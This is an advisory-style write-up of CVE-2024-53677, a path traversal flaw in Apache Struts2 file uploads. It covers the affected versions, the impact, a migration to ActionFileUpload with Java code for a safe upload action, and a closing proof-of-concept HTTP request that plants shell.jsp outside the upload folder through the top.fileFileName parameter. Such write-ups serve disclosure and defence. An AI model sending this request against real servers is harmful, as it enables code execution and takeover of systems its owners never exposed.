Upload Path Traversal in Apache Struts2 – CVE-2024-53677

Vulnerable Version

2.0.0 to 2.3.37 (End-of-life)
2.5.0 to 2.5.33
6.0.0 to 6.3.0.2

Fixed Version

Struts 6.5.0 or greater

Base Score

9.5 Critical

Vendor Description:-

Apache Struts 2 is a presentation framework used to create Java web applications with a Model, View, Controller (MVC) architecture. Web applications built with Apache Struts 2 were first launched in 2006 and are still in use today, with the Apache Software Foundation continuing to develop the project. However, many Java web app developers prefer Spring Framework to Struts for new projects.

Vulnerability Description:-

This vulnerability stems from the file upload mechanism in FileUploadInterceptor, a component of the default interceptor stack that stores an uploaded file while the multipart request is processed. Because the upload logic is flawed, an attacker who can reach an upload action can manipulate the upload parameters so that the file is written outside the intended directory (path traversal), placing a malicious file where the server will later serve or execute it. Applications that do not use FileUploadInterceptor are unaffected. Apache Struts 6.4.0 introduced, among other enhancements, a new file upload mechanism, the ActionFileUpload interceptor; when the action is executed, this interceptor reports problems with the upload as field errors. This new mechanism is the fix for CVE-2024-53677.

Impact

  • Remote Code Execution (RCE): An attacker can run arbitrary commands on the server, potentially obtaining complete control of the compromised machine.
  • Data Breach: Unauthorized access to sensitive information held on the server.
  • System Integrity Risks: malware installation, unauthorized changes to system configurations, and use of the compromised server to launch attacks on other systems.

Mitigations

Applying the recommended fix, migrating applications that use FileUploadInterceptor to ActionFileUploadInterceptor, requires developers to modify and test their code before releasing a patched version of the application.

Apache notes that this change is not backward compatible, and continuing to use the old mechanism keeps systems vulnerable regardless of whether they are running the newer version of Struts. In Struts 7.0.0 (released December 20, 2024), the FileUploadInterceptor has been removed.
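The migration described above, as an added example that is not Apache's own code: a Struts action that receives files through the ActionFileUpload mechanism (wired in struts.xml with <interceptor-ref name="actionFileUpload"/> in place of "fileUpload") and stores them under a fixed directory. The class name, the storage path /var/app/uploads, and the use of the default multipart parser (which exposes each upload as a temporary File) are assumptions.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardCopyOption;
import java.util.List;
import com.opensymphony.xwork2.ActionSupport;
import org.apache.struts2.action.UploadedFilesAware;
import org.apache.struts2.dispatcher.multipart.UploadedFile;

public class SafeUploadAction extends ActionSupport implements UploadedFilesAware {
    // Assumed storage root outside the web root, so nothing stored here is served or executed.
    private static final Path UPLOAD_ROOT = Paths.get("/var/app/uploads").toAbsolutePath().normalize();
    private List<UploadedFile> uploadedFiles;

    // actionFileUpload hands the parsed files to the action here; there is no fileFileName
    // setter for a request parameter such as top.fileFileName to reach.
    @Override
    public void withUploadedFiles(List<UploadedFile> uploadedFiles) {
        this.uploadedFiles = uploadedFiles;
    }

    @Override
    public String execute() throws IOException {
        if (uploadedFiles == null || uploadedFiles.isEmpty()) {
            addActionError("No file uploaded");
            return INPUT;
        }
        for (UploadedFile f : uploadedFiles) {
            Path target = safeTarget(f.getOriginalName());
            if (target == null) {
                addActionError("Rejected file name: " + f.getOriginalName());
                return INPUT;
            }
            // Assumed: with the default multipart parser, getContent() is the temp File Struts wrote.
            Files.copy(((File) f.getContent()).toPath(), target, StandardCopyOption.REPLACE_EXISTING);
        }
        return SUCCESS;
    }

    // Keep only the base name of the client-supplied name and confirm the resolved target
    // still lies under UPLOAD_ROOT: "../shell.jsp" becomes UPLOAD_ROOT/shell.jsp, never a parent.
    static Path safeTarget(String originalName) {
        if (originalName == null || originalName.isBlank()) return null;
        Path base = Paths.get(originalName.replace('\\', '/')).getFileName();
        if (base == null) return null;
        Path target = UPLOAD_ROOT.resolve(base).normalize();
        return target.startsWith(UPLOAD_ROOT) && !target.equals(UPLOAD_ROOT) ? target : null;
    }
}
```

Pair this with the interceptor's allowedExtensions or allowedTypes parameters so that executable content such as .jsp is rejected before the action runs at all.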

POC:-

POST /index.action HTTP/1.1
Host: <target ip>
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: <your browsing user agent>
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl6ZFZPznNSPZOFJF
Content-Length: 335

------WebKitFormBoundaryl6ZFZPznNSPZOFJF
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: text/plain

<% out.println("hello world"); %>
------WebKitFormBoundaryl6ZFZPznNSPZOFJF
Content-Disposition: form-data; name="top.fileFileName"

../shell.jsp
------WebKitFormBoundaryl6ZFZPznNSPZOFJF--

After this request, shell.jsp has been written to the traversed location (one directory above the upload folder, as dictated by the top.fileFileName parameter) and is visible on the server.

